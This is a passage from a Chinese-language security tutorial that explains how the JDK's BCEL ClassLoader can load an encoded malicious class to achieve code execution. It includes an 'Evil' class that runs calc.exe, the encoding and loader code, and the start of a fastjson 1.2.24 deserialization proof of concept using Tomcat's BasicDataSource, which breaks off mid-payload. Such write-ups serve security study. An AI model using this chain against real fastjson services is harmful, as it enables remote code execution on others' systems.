前言
BCEL
BCEL的全名是Apache Commons BCEL,属于Apache Commons项目下的一个子项目,CC链也就是从Apache Commons
产生的。
BCEL库提供了一系列用于分析、创建、修改Java Class文件的API。主要用来将xml文档转为class文件。编译后的class被称为translet,可以在后续用于对XML文件的转换。该库已经内置在了JDK中。关于BCEL具体详情可参考https://www.leavesongs.com/PENETRATION/where-is-bcel-classloader.html
。
如何利用BCEL进行命令执行
BCEL中有一个类com.sun.org.apache.bcel.internal.util.ClassLoader
,是一个ClassLoader,重写了loadClass
方法。在ClassLoader#loadClass()
中,其会判断类名是否是$$BCEL$$
开头,如果是的话,将会对这个字符串进行decode。
首先编写一个恶意类
package com.darkerbox.bcel;
public class Evil {
static {
try {
Runtime.getRuntime().exec("calc.exe");
} catch (Exception e) {
e.printStackTrace();
}
}
}
然后将该类生成为BCEL格式的字节码,使用这个字节码来新建对象,执行命令。
package com.darkerbox.bcel;
import com.sun.org.apache.bcel.internal.Repository;
import com.sun.org.apache.bcel.internal.classfile.JavaClass;
import com.sun.org.apache.bcel.internal.classfile.Utility;
import com.sun.org.apache.bcel.internal.util.ClassLoader;
import java.io.IOException;
public class BcelTest {
public static void main(String[] args) throws IOException, ClassNotFoundException, IllegalAccessException, InstantiationException {
JavaClass cls = Repository.lookupClass(Evil.class);
String code = Utility.encode(cls.getBytes(),true);
System.out.println("$$BCEL$$"+code);
// 加载类并实例化
new ClassLoader().loadClass("$$BCEL$$"+code).newInstance();
}
}
我本地使用到的依赖。
<dependency>
<groupId>com.alibaba</groupId>
<artifactId>fastjson</artifactId>
<version>1.2.24</version>
</dependency>
<dependency>
<groupId>org.apache.tomcat</groupId>
<artifactId>tomcat-dbcp</artifactId>
<version>9.0.20</version>
</dependency>
在fastjson中的利用
先看看POC
package com.darkerbox.bcel;
import com.alibaba.fastjson.JSON;
public class test {
public static void main(String[] args) {
String payload =
"{\n"
+ " {\n"
+ " \"aaa\": {\n"
+ " \"@type\": \"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\n"
+ " \"driverClassLoader\": {\n"
+